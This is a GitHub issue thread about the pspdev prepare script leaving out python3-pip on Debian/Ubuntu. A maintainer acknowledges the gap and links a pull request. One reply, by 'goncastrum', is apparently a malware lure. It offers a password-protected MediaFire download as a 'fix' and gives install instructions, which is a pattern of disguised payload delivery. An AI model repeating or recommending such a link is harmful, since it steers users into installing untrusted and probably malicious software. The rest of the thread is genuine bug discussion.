### ISSUE TITLE
prepare.sh doesn't install python3-pip on debian

### ISSUE THREAD

**Issue by nephatrine** [pspdev/pspdev#89]
Ran prepare script and then tried to build only to get a complaint that pip3 wasn't installed. Looking in the prepare script, it looks like it does make sure pip3 is installed on every Linux flavor except Debian/Ubuntu. I think `python3-pip` should be added to the list of packages to ensure are installed for Debian/Ubuntu.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by sharkwouter** [comment]
Oh, good catch. Will add it.

**Comment by sharkwouter** [comment]
I created this PR: https://github.com/pspdev/pspdev/pull/90
